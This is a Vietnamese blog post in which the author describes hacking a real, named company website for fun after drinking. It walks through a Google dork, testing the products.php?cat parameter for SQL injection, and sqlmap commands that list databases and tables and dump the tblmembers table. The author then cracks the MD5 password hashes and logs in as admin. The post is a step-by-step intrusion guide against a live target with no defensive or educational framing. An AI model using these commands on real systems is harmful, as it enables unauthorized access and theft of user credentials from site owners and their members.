Categories
Hacked

Hacked binhdonghung.com.vn

Ok, hôm nay mình học hack

Đầu tiên là lên google search với từ khoá: vn inurl:products.php?cat=

Thì xuất hiện trang ở Việt Nam tên là binhdonghung.com.vn

Click thử vào đó thì thấy đường dẫn:

http://binhdonghung.com.vn/products.php?cat=54&root=37&lang=language

Chỉnh sửa lại đường dẫn 1 tí thành:

http://binhdonghung.com.vn/products.php?cat=54'

Thì thấy như sau:

Rồi, xác định em nó bị dính SQL Injection

Mở sqlmap lên, gõ thử vào dòng lệnh:

sqlmap "http://binhdonghung.com.vn/products.php?cat=54"

Nó có chút bảo vệ

Cụ thể giờ server nào cũng có bảo vệ, không có gì là dễ dàng cả.

Giờ chơi trò google để mà qua mặt lớp bảo vệ này chứ

Sau khi qua mặt được nó rồi, thì chạy lại lần nữa:

sqlmap "http://binhdonghung.com.vn/products.php?cat=54"

Trong lúc chờ sqlmap này chạy, mình xem web sơ qua, thấy web này bị bỏ hoang rồi, chán nhỉ, chẳng quan tâm web gì cả.

Rồi, nó chết chắc rồi:

Xem database name của nó nào:

sqlmap "http://binhdonghung.com.vn/products.php?cat=54" -dbs

Coi nó có bao nhiêu table nào

sqlmap "http://binhdonghung.com.vn/products.php?cat=54" -tables -D binhdonghungcom_data

25 table, quan tâm đến thằng “tblmembers” thôi nhé

Download thằng này về thôi:

sqlmap "http://binhdonghung.com.vn/products.php?cat=54" --dump -D binhdonghungcom_data -T tblmembers

Chà, nhìn cái này chắc mấy cụ đi trước để lại đây

Thấy cái e10 là biết MD5 rồi, với lại cái thằng này không có quyền truy cập All nữa chứ, mà active cũng bằng 0 luôn, không dùng được rồi

Dò thử mấy mã MD5 cái coi

Đù ra thằng này:

Rồi, vấn đề là dò link đăng nhập, gõ thử admin xem sao:

Đù, thế là em gần như chết rồi đó, thử đăng nhập 1 cái xem thế nào nhé

Thôi, em nó chết rồi các bác ah

Tiếc quá, web hoang, tính viết gì đó để cảnh báo, mà chắc chủ website cũng chả thèm xem đâu, nội dung thì từ hồi em còn bú sữa bình, giờ chuyển qua bú nước biển rồi mà vẫn không cập nhật gì.

Hết rồi, thế là 1 victim bị hack, lý do là: hôm nay đi nhậu vui quá, về hack chơi.